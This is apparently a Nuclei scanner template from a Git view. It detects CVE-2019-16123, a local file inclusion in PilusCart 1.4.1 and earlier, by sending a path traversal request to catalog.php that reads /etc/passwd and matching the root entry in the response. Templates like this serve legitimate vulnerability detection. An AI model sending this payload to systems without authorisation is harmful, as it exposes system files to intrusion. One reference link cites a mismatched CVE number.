nuclei-templates/http/cves/2019/CVE-2019-16123.yaml

41 lines
1.1 KiB
YAML
Raw Normal View History

2021-10-30 21:48:32 +00:00
id: CVE-2019-16123
2021-10-30 21:48:32 +00:00
info:
name: PilusCart <=1.4.1 - Local File Inclusion
2021-10-30 21:48:32 +00:00
author: 0x_Akoko
severity: high
2022-06-20 17:28:52 +00:00
description: |
PilusCart versions 1.4.1 and prior suffer from a file disclosure vulnerability via local file inclusion.
2021-10-30 21:48:32 +00:00
reference:
- https://packetstormsecurity.com/files/154250/PilusCart-1.4.1-Local-File-Disclosure.html
- https://www.exploit-db.com/exploits/47315
- https://nvd.nist.gov/vuln/detail/CVE-2019-1653
2023-07-11 19:49:27 +00:00
- https://zerodays.lol/
2021-10-30 21:48:32 +00:00
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2019-16123
cwe-id: CWE-22
2023-07-11 19:49:27 +00:00
epss-score: 0.72953
cpe: cpe:2.3:a:kartatopia:piluscart:*:*:*:*:*:*:*:*
metadata:
max-request: 1
2023-07-11 19:49:27 +00:00
vendor: kartatopia
product: piluscart
tags: piluscart,lfi,packetstorm,edb,cve,cve2019
2021-10-30 21:48:32 +00:00
http:
2021-10-30 21:48:32 +00:00
- method: GET
path:
- "{{BaseURL}}/catalog.php?filename=../../../../../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[x*]:0:0"
- type: status
status:
- 200